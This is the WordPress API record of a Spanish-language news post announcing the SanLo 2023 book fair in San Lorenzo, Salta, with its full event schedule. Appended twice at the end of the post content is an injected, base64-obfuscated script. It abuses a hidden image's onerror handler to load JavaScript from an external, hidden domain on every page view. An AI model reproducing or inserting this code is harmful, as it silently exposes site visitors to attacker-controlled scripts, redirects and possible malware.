{"id":3039,"date":"2023-08-30T08:47:17","date_gmt":"2023-08-30T11:47:17","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3039"},"modified":"2025-08-14T00:09:31","modified_gmt":"2025-08-14T03:09:31","slug":"se-realizara-la-primera-feria-del-libro-en-san-lorenzo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3039","title":{"rendered":"Se realizar\u00e1 la primera Feria del Libro en San Lorenzo"},"content":{"rendered":"\n<p class=\"has-white-color has-text-color has-background\" style=\"background-color:#710435\"><strong><em>\u201cSanLo 2023\u201d es la primera Feria del Libro construida por lectores en Salta. La misma se llevar\u00e1 a cabo del 2 al 9 de septiembre en la Biblioteca Popular \u201cTata Sarapura\u201d, ubicada en Juan Carlos D\u00e1valos 1.000 en la Municipalidad de San Lorenzo.<\/em><\/strong><\/p>\n\n\n\n<p>El s\u00e1bado 2 de septiembre, a las 11, dar\u00e1 inicio \u00abSanLo 2023\u00bb, la primera Feria del Libro construida por lectores en Salta con la charla \u201cPatrimonio Folkl\u00f3rico Argentino\u201d a cargo del historiador Jos\u00e9 de Guardia de Pont\u00e9 &#8211; Museo Gesta G\u00fcemesiana \u2013 Fort\u00edn Juan Carlos D\u00e1valos.<\/p>\n\n\n\n<p>Continuar\u00e1 el lunes 4 de septiembre de 2023, a las 14 horas&nbsp;con el taller \u201cCon sabor a Cuentos\u201d, a cargo de la autora Raquel Espinosa conjuntamente con los alumnos del Colegio Secundario Juan M. de Rosas. A las 18, tendr\u00e1 lugar la presentaci\u00f3n de la revista \u201cLa Gauchita\u201d a cargo del escritor Eduardo Ceballos, quien har\u00e1 un recorrido a trav\u00e9s de los a\u00f1os de la revista coleccionable y sus art\u00edculos m\u00e1s destacados de San Lorenzo. Asimismo Eduardo Medina, presidente de la Sociedad Argentina de Escritores Filial Salta, acompa\u00f1ar\u00e1 la presentaci\u00f3n.<\/p>\n\n\n\n<p>La presentaci\u00f3n video de poemas a cargo del Contra Almirante Enrique Mart\u00ednez ser\u00e1 a las 18:55.&nbsp;Finalmente a las 19&nbsp;se realizar\u00e1 la presentaci\u00f3n del libro \u201cHoy es el Dia\u201d, sobre la herida abierta del submarino ARA San Juan de la autora Mar\u00eda Eugenia Ulivarrri Rodi.<\/p>\n\n\n\n<p>El martes 5 de septiembre a las 17 se llevar\u00e1 a cabo la mesa a cargo de Adriana Taruselli y F\u00e1tima Taruselli. Ambas, presentar\u00e1n un recorrido por la obra literaria y filos\u00f3fica de Eugenio Taruselli. Tendr\u00e1 lugar no solo una exposici\u00f3n de libros, sino tambi\u00e9n la donaci\u00f3n y entrega de libros a la Biblioteca Tata Sarapura. A las 18, continuar\u00e1 la jornada con la Mesa Ecl\u00e9ctica a cargo de los escritores: Horacio D\u2019Achary con su libro \u201cTierrita de colores\u201d (prosa po\u00e9tica), Marra Juarez, con su libro \u201cPalabras Frescas, Palabras calientes\u201d (poes\u00eda), Camila Cachambi con su libro \u201cUn d\u00eda a la vez\u201d y Lourdez Pourriex con su libro \u201cQuiz\u00e1s lo m\u00edo no es arte\u201d. Esta actividad es presentada por Editorial Juana Manuela. Finalmente a las 19&nbsp;se llevar\u00e1 adelante el taller de poes\u00eda l\u00fadica a cargo del poeta Aldo Guardatti.<\/p>\n\n\n\n<p>El programa para el d\u00eda mi\u00e9rcoles 6 de septiembre inicia con la presentaci\u00f3n del libro \u201cCuentos breves de historias largas\u201d, por su autora Liz Maxit a las 17 horas.&nbsp;A las 18, se realizar\u00e1 la introducci\u00f3n a los libros \u201cEn el Para\u00edso Prometido\u201d, \u201cDel Amor Esclavo\u201d y \u201cLos esclavos afro descendientes en la Salta Colonial\u201d de su autora Ana Mar\u00eda Gallardo. A las 19,&nbsp;se llevar\u00e1 a cabo el di\u00e1logo-taller, \u201cEl oficio de escribir\u201d entre las escritoras Mar\u00eda Bel\u00e9n Alem\u00e1n y Raquel Espinosa.<\/p>\n\n\n\n<p>El jueves 7 de septiembre, a las 17 tendr\u00e1 lugar el encuentro de j\u00f3venes, con poes\u00eda en lenguas extranjeras y aut\u00f3ctonas. A las 19, la presentaci\u00f3n de los libros \u201cFundaci\u00f3n de la Ci\u00e9nega de San Lorenzo\u201d y \u201cFundaci\u00f3n de la Villa San Lorenzo\u201d ser\u00e1n expuestos por su autor Virgilio Nu\u00f1ez.<\/p>\n\n\n\n<p>Por su parte, el viernes 8 de septiembre a las 15:30 , habr\u00e1 lectura del libro \u201cEl Cuis Ram\u00f3n y sus amigos\u201d por parte de la autora Mar\u00eda Luisa Dellatorre. A las 16, se llevar\u00e1 a cabo una Mesa de Escritoras Infantiles a cargo de las escritoras: Laura Menacho y Claudia Aramayo. Por su parte, a las 17, tendr\u00e1 lugar la Mesa Infantil a cargo de escritores: Gabriela Garc\u00eda con su libro \u201cRimaditos para los m\u00e1s chiquitos\u201d, \u00c1ngela Aguirre con su libro \u201cLas Aventuras de Taquito\u201d y Raquel Espinosa con su libro \u201cPalabras m\u00e1gicas\u201d, estos libros ser\u00e1n presentados a trav\u00e9s de la Editorial Juana Manuela. Finalmente, se presentar\u00e1 a las 18&nbsp;el libro \u201cAs\u00ed fue que la llamaron Salta\u201d del autor Rafael Guti\u00e9rrez y a las 18:30, una mesa de lectura con los escritores Jos\u00e9 Cantero Verni, Marcelo Ag\u00fcero Urquiza y Eduardo Medina presentados por Editorial Duende Cartonero. A las 19:30, se presentar\u00e1 el libro \u201cSinton\u00eda\u201d de Ramiro Trunsky, como as\u00ed tambi\u00e9n, una interpretaci\u00f3n musical a cargo de Ramiro Trunsky.<\/p>\n\n\n\n<p>Durante la \u00faltima jornada, el s\u00e1bado 9 de septiembre a las 16 se presentar\u00e1n mesas de editoriales invitadas. Contaremos con la presentaci\u00f3n del libro \u201cReflejos\u201d de Lila Jos\u00e9; el Taller \u201cHerramientas dirigidas a escritores para escribir en Redes Sociales\u201d a cargo de la autora Eva Braum (SADE Moreno, Buenos Aires); la presentaci\u00f3n libro \u201cExiliados \u2013 Migrantes Excluidos\u201d de las autoras Eva Braum y Cristina Pereda. A las 18, habr\u00e1 entrega de Premios del Certamen Po\u00e9tico \u201cComposici\u00f3n seg\u00fan la Estrofa Julia\u201d a cargo del escritor Aldo Guardatti, seguido de una Mesa de lectura autores provinciales de la SADE Filial Salta Mauro Martina, Jos\u00e9 Ch\u00e1vez Cecilia Barba, M\u00f3nica Ovejero, Abel Frossasco, Yolanda Justiniano, Andrea Tolaba, In\u00e9s Obando. Finalmente se presentar\u00e1 el libro \u201cGertrudis Medeiros, hero\u00edna de la patria\u201d de Eduardo Medina y en la Parroquia San Lorenzo a las 20, se llevar\u00e1 a cabo la entrega de Premios en el Certamen Po\u00e9tico religioso \u201cSan Lorenzo M\u00e1rtir \u201c a cargo de los miembros del jurado; Carmen Figueroa, Ver\u00f3nica C\u00e1nepa, el P\u00e1rroco Oscar Ossola. Finalmente, se realizar\u00e1 el gran cierre de la I Feria del Libro de SanLo 2023, con el Concierto de \u201cAntiqua Camera\u201d, bajo la direcci\u00f3n del maestro Jorge Lehz.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/se-realizara-la-primera-feria-del-libro-en-san-lorenzo-91384\" target=\"_blank\" rel=\"noopener\" title=\"\">\u00a0<strong>Secretaria de Prensa y Comunicaci\u00f3n<\/strong><\/a><\/p>\n\n\n\n<p><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/91384-se-realizara-la-primera-feria-del-libro-en-san-lorenzo.jpg\"><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>\u201cSanLo 2023\u201d es la primera Feria del Libro construida por lectores en Salta. La misma se llevar\u00e1 a cabo del 2 al 9 de septiembre en la Biblioteca Popular \u201cTata Sarapura\u201d, ubicada en Juan Carlos D\u00e1valos 1.000 en la Municipalidad de San Lorenzo. El s\u00e1bado 2 de septiembre, a las 11, dar\u00e1 inicio \u00abSanLo 2023\u00bb, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3040,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[26,16],"tags":[],"class_list":{"0":"post-3039","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-culturales","8":"category-ferias-y-congresos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3039"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3039"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3039\/revisions"}],"predecessor-version":[{"id":6979,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3039\/revisions\/6979"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3040"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3039"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3039"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3039"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}